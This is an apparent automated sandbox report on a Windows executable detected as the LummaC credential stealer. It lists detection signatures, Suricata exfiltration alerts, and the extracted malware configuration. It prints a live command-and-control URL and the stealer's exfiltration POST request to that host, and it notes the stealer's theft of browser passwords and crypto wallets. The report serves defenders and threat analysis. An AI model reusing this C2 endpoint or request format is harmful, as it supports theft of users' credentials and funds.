Edit tour

Windows Analysis Report
I5jG2Os8GA.exe

Overview

General Information

Sample name:	I5jG2Os8GA.exe renamed because original name is a hash value
Original sample name:	1fbbcb432e80904478cd943fef44a3b5632dfd25d77ad2c4995d8ccc55a3b919.exe
Analysis ID:	1555045
MD5:	e90e793f59c0a6a60182c3f3a597ff0c
SHA1:	6b9f2bf982e071bfd9b4b371e581993ed3ef8a7c
SHA256:	1fbbcb432e80904478cd943fef44a3b5632dfd25d77ad2c4995d8ccc55a3b919
Tags:	94-158-244-69exeuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to hide a thread from the debugger

Delayed program exit found

Found API chain indicative of debugger detection

Found evasive API chain (may stop execution after checking computer name)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Enables driver privileges

Found evasive API chain (date check)

Found evasive API chain (may stop execution after accessing registry keys)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

I5jG2Os8GA.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\I5jG2Os8GA.exe" MD5: E90E793F59C0A6A60182C3F3A597FF0C)

WerFault.exe (PID: 3324 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7276 -s 1720 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_LummaCStealer_1	Yara detected LummaC Stealer	Joe Security
dump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.1263036918.0000000004280000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
00000000.00000002.3054761261.0000000002778000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1450:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: I5jG2Os8GA.exe PID: 7276	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: I5jG2Os8GA.exe PID: 7276	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: I5jG2Os8GA.exe PID: 7276	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.I5jG2Os8GA.exe.4280000.0.unpack	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
0.3.I5jG2Os8GA.exe.4280000.0.raw.unpack	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
0.2.I5jG2Os8GA.exe.400000.0.unpack	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
0.2.I5jG2Os8GA.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T10:54:17.003790+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.10	49759	TCP
2024-11-13T10:54:54.605405+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.10	49975	TCP

ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T10:53:29.772818+0100	2043206	1	A Network Trojan was detected	192.168.2.10	49979	94.158.244.69	80	TCP
2024-11-13T10:54:30.179436+0100	2043206	1	A Network Trojan was detected	192.168.2.10	49799	94.158.244.69	80	TCP
2024-11-13T10:54:39.654677+0100	2043206	1	A Network Trojan was detected	192.168.2.10	49854	94.158.244.69	80	TCP
2024-11-13T10:54:48.777818+0100	2043206	1	A Network Trojan was detected	192.168.2.10	49905	94.158.244.69	80	TCP
2024-11-13T10:54:57.784098+0100	2043206	1	A Network Trojan was detected	192.168.2.10	49951	94.158.244.69	80	TCP
2024-11-13T10:55:06.773949+0100	2043206	1	A Network Trojan was detected	192.168.2.10	49978	94.158.244.69	80	TCP
2024-11-13T10:55:24.717528+0100	2043206	1	A Network Trojan was detected	192.168.2.10	49980	94.158.244.69	80	TCP
2024-11-13T10:55:25.421751+0100	2043206	1	A Network Trojan was detected	192.168.2.10	49981	94.158.244.69	80	TCP
2024-11-13T10:55:42.661653+0100	2043206	1	A Network Trojan was detected	192.168.2.10	49982	94.158.244.69	80	TCP
2024-11-13T10:55:51.436285+0100	2043206	1	A Network Trojan was detected	192.168.2.10	49983	94.158.244.69	80	TCP
2024-11-13T10:56:00.595324+0100	2043206	1	A Network Trojan was detected	192.168.2.10	49984	94.158.244.69	80	TCP
2024-11-13T10:56:09.361497+0100	2043206	1	A Network Trojan was detected	192.168.2.10	49985	94.158.244.69	80	TCP
2024-11-13T10:56:18.125634+0100	2043206	1	A Network Trojan was detected	192.168.2.10	49986	94.158.244.69	80	TCP
2024-11-13T10:56:26.916302+0100	2043206	1	A Network Trojan was detected	192.168.2.10	49987	94.158.244.69	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T10:55:25.421751+0100	2843864	1	A Network Trojan was detected	192.168.2.10	49981	94.158.244.69	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.3060354887.00000000052A0000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}

Multi AV Scanner detection for submitted file

Source: I5jG2Os8GA.exe

ReversingLabs: Detection: 89%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: I5jG2Os8GA.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Code function: 0_2_004052D9 CryptUnprotectData,

0_2_004052D9

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Unpacked PE file: 0.2.I5jG2Os8GA.exe.400000.0.unpack

Source: I5jG2Os8GA.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:

Binary string: C:\dat\yijole\segod\dile62\ru.pdb source: I5jG2Os8GA.exe

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00451F08 FindFirstFileExW,	0_2_00451F08
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00451FBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00451FBC
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0425216F FindFirstFileExW,	0_2_0425216F
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04252223 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_04252223

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49854 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49799 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49905 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49978 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49951 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49983 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49986 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49981 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.10:49981 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49982 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49984 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49985 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49980 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49987 -> 94.158.244.69:80
Source: Network traffic	Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.10:49979 -> 94.158.244.69:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://94.158.244.69/c2sock

Source: Joe Sandbox View

IP Address: 94.158.244.69 94.158.244.69

Source: Joe Sandbox View

ASN Name: MIVOCLOUDMD MIVOCLOUDMD

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.10:49759
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.10:49975

Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.244.69

Source: unknown

HTTP traffic detected: POST /c2sock HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: TeslaBrowser/5.5Content-Length: 16798Host: 94.158.244.69

Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.000000000566B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/
Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/0WJ9
Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/9dokr
Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/O4ze
Source: I5jG2Os8GA.exe, 00000000.00000002.3054795348.00000000027D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/SO
Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/Xl2v
Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/ZD8C
Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/ZKAf
Source: I5jG2Os8GA.exe, 00000000.00000002.3060354887.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/c2sock
Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp, I5jG2Os8GA.exe, 00000000.00000002.3060914805.0000000005504000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/c2sock5
Source: I5jG2Os8GA.exe, 00000000.00000002.3060354887.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/c2sockP
Source: I5jG2Os8GA.exe, 00000000.00000002.3060354887.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/c2sockb
Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.0000000005504000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/c2socks
Source: I5jG2Os8GA.exe, 00000000.00000002.3054795348.00000000027FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/c2socks0
Source: I5jG2Os8GA.exe, 00000000.00000002.3060354887.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/c2sockv
Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/e/IR
Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/iU89
Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/j3Rh
Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/l0FL
Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/qSC2
Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/rD3S
Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/rF5X
Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/t8EB
Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/xQclE
Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.158.244.69/xjsh
Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.14.dr	String found in binary or memory: http://upx.sf.net
Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: I5jG2Os8GA.exe, 00000000.00000002.3061736337.0000000005C99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: I5jG2Os8GA.exe, 00000000.00000002.3061736337.0000000005C99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: I5jG2Os8GA.exe, 00000000.00000002.3061736337.0000000005C99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
Source: I5jG2Os8GA.exe, 00000000.00000002.3061736337.0000000005C99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
Source: I5jG2Os8GA.exe, 00000000.00000002.3061736337.0000000005C99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: I5jG2Os8GA.exe, 00000000.00000002.3061736337.0000000005C99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: I5jG2Os8GA.exe, 00000000.00000002.3061736337.0000000005C99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.3054761261.0000000002778000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0040B81C lstrcatW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrcmpW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,NtCreateFile,lstrcatW,NtQueryDirectoryFile,lstrcmpW,NtClose,lstrcmpW,lstrlenW,lstrlenW,lstrcmpW,	0_2_0040B81C
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00422177 NtQueryInformationProcess,	0_2_00422177
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0040A928 lstrcmpW,lstrlenW,lstrcatW,NtCreateFile,lstrcatW,lstrlenW,	0_2_0040A928
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0040B129 lstrcatW,lstrcatW,NtReadFile,NtClose,	0_2_0040B129
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0042F1C2 NtClose,	0_2_0042F1C2
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,	0_2_0041F9A4
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_004244E4 NtSetInformationThread,	0_2_004244E4
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_004224A3 NtQueryInformationProcess,	0_2_004224A3
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_004245EC NtQuerySystemInformation,	0_2_004245EC
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00421EEB NtQueryInformationProcess,	0_2_00421EEB
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0040B7BB lstrcmpW,NtClose,	0_2_0040B7BB
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0040B7F5 NtClose,	0_2_0040B7F5

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0040B81C	0_2_0040B81C
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0042C0DA	0_2_0042C0DA
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00434080	0_2_00434080
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0040E14E	0_2_0040E14E
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0040A928	0_2_0040A928
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0040B129	0_2_0040B129
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0042B9C5	0_2_0042B9C5
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_004069A1	0_2_004069A1
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0041F9A4	0_2_0041F9A4
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0041C270	0_2_0041C270
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0042F278	0_2_0042F278
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0040620B	0_2_0040620B
